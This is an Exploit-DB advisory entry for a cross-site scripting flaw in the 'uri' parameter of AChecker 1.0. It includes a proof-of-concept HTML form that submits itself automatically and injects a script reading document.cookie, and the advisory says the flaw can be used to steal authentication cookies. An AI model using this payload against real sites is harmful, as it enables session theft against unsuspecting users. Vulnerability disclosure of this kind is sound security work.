AChecker 1.0 - 'uri' Parameter Cross-Site Scripting Vulnerability

2010-09-15T00:00:00
ID EDB-ID:34630
Type exploitdb
Reporter High-Tech Bridge SA
Modified 2010-09-15T00:00:00

Description

AChecker 1.0 'uri' Parameter Cross-Site Scripting Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/43240/info

AChecker is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

AChecker 1.0 is vulnerable; other versions may be affected. 

<form action="http://www.example.com/index.php" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="uri" value='http://1"><script>alert(document.cookie)</script>' />
<input type="hidden" name="validate_uri" value="Check It" />
<input type="hidden" name="MAX_FILE_SIZE" value="52428800" />
<input type="hidden" name="uploadfile"; filename="" />
<input type="hidden" name="gid[]" value="8" />
</form>
<script>
document.main.submit();
</script>